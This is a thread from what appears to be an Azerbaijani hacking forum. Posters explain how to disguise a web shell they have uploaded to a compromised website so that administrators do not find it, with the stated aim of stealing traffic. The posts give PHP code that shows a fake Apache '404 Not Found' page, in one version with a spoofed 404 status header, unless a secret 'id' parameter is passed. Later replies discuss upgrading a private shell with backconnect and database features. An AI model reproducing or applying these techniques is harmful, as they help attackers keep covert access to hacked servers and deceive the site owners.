Hərdən elə olurki sayta shell upload edəndən sonra onu hacklamaq yox misal üçün traffiki oğurlamaq üçün shell-i serverdə admindən gizlətmək tələb olunur
Sizlərə indi shell-i 404 error adı altında gizlətməyi göstərəcəm
İş üçün bu shelli götürək http://anti-armenia.org/forums.php?m=posts&q=499
Shellin source kodunu baxırıq
Kodun lap əvvəlində <?php dan sonra belə bir kod əlavə edirik
Kod:
# id
# shell
if ($_GET['id'] == 'shell'){
və sonra shellin kodunu lap sonuna bu kodu əlavə edirik
Kod:
}else{
echo'
<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port 80</address>
';
}
vəssalam , shelli 404.php fayl adı altında save edirik
əgər kimsə brauzerdə 404.php faylını açmaq istəsə ona 404 erroru görsənəcək
shelli açmaq üçün brauzerdə bu url-i açmaq lazımdir
Belə daha qəşəngdir)) Çünki yuxarıdakında status code 200 verəcək onunla bilmək olar.
Kod:
<?php
$xD='<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . PHP_EOL;
if(!isset($_GET['id']) || empty($_GET['id']) || !is_string($_GET['id'])){echo $xD;header('Status: 404 Not found!');exit;}?>
<?php
/*Actual backdoor goes here*/
echo '<h1>Welcome to your Shell!</h1>' . PHP_EOL . '<br>' .PHP_EOL;
?>
@StealtH
if else aləmi qatacaq çünki shellərin əksəriyyəti short_open tags deyil full tagların açılması ilə yazılır.
Başı çıxmayan adam sözsüzki gör nəqədər problem yaşacaq if else edənə qədər.
Mən verdiyim metod isə sadə və daha gözəldir else-ə də heç ehtiyyac yoxdur skript yuxarıdakı yoxlanışda avtomatik özünü çezdirəcək deyə)
@AZE.HacK
Bunu copy/paste elə shellə:
Kod:
<?php
$xD='<h1>Not Found</h1>
<p>The requested URL was not found on this server.</p>
<hr>
<address>Apache Server at '.$_SERVER['HTTP_HOST'].' Port ' . $_SERVER['SERVER_PORT'] . '</address>' . PHP_EOL;
if(!isset($_GET['id']) || empty($_GET['id']) || !is_string($_GET['id'])){echo $xD;header('Status: 404 Not found!');exit;}?>
BlackMinD Salam Əleyküm bro mən elə kukladan istifadə edirəm yəni şelli gizlətmək lazım olanda kuklanı işə salıram gizlədirəm))
həm gizlənir həmdə şifrəlidir))
xaxaxaxA) Bro mənim o shellimi deyirsən? xD
Onu gərək təkmilləşdirime bro yəqinki versiya 3 gələcək birazdana.İnankı o qədər baş qarışıq olurki hər dəfə yadan çıxır amma söz Priv 3 yazacağam əlavələr edəcəyəm PostGres,MSSQL-nən işi də əlavə edəcəyəm)
xaxaxaxA) Bro mənim o shellimi deyirsən? xD
Onu gərək təkmilləşdirime bro yəqinki versiya 3 gələcək birazdana.İnankı o qədər baş qarışıq olurki hər dəfə yadan çıxır amma söz Priv 3 yazacağam əlavələr edəcəyəm PostGres,MSSQL-nən işi də əlavə edəcəyəm)
həəə onu deyirəm sənə keçəndəfə demişdim onu təkmilləşdir məsələn backconnect və sariə lazımlı əmirlər əlavə et